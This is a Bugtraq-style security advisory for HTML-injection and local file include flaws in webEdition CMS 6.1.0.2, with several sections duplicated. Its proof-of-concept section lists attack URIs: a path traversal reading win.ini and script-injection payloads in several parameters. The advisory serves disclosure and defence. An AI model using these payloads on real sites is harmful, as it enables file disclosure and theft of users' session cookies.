webEdition CMS HTML Injection and Local File Include Vulnerabilities
BID:47047
Info
webEdition CMS HTML Injection and Local File Include Vulnerabilities
| Bugtraq ID: | 47047 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 27 2011 12:00AM |
| Updated: | Mar 27 2011 12:00AM |
| Credit: | AutoSec Tools |
| Vulnerable: |
webEdition e.V. webEdition CMS 6.1.0.2 |
| Not Vulnerable: | |
Discussion
webEdition CMS HTML Injection and Local File Include Vulnerabilities
webEdition CMS is prone to multiple HTML-injection vulnerabilities and a local file-include vulnerability.
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
webEdition CMS 6.1.0.2 is vulnerable; other versions may also be affected.
webEdition CMS is prone to multiple HTML-injection vulnerabilities and a local file-include vulnerability.
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
webEdition CMS 6.1.0.2 is vulnerable; other versions may also be affected.
Exploit / POC
webEdition CMS HTML Injection and Local File Include Vulnerabilities
An attacker can exploit these issues through a browser.
The following example URIs are available:
Local file include:
http://www.example.com/webedition/we/include/we_modules/show.php?mod=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
HTML injection:
http://www.example.com/webedition/openBrowser.php?url=%22onload=%22alert%280%29
http://www.example.com/webedition/we/include/we_modules/shop/edit_shop_editorFrameset.php?bid=%22onload=%22alert%280%29
http://www.example.com/webedition/we/include/we_modules/messaging/messaging_show_folder_content.php?we_transaction=%22;}alert%280%29;{//
http://www.example.com/webedition/we/include/weTracking/econda/weEcondaImplement.inc.php?we_objectID=&shop_artikelid=%27;alert%280%29;//
An attacker can exploit these issues through a browser.
The following example URIs are available:
Local file include:
http://www.example.com/webedition/we/include/we_modules/show.php?mod=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
HTML injection:
http://www.example.com/webedition/openBrowser.php?url=%22onload=%22alert%280%29
http://www.example.com/webedition/we/include/we_modules/shop/edit_shop_editorFrameset.php?bid=%22onload=%22alert%280%29
http://www.example.com/webedition/we/include/we_modules/messaging/messaging_show_folder_content.php?we_transaction=%22;}alert%280%29;{//
http://www.example.com/webedition/we/include/weTracking/econda/weEcondaImplement.inc.php?we_objectID=&shop_artikelid=%27;alert%280%29;//
Solution / Fix
webEdition CMS HTML Injection and Local File Include Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
webEdition CMS HTML Injection and Local File Include Vulnerabilities
References:
References:
- Vendor Homepage (webEdition e.V.)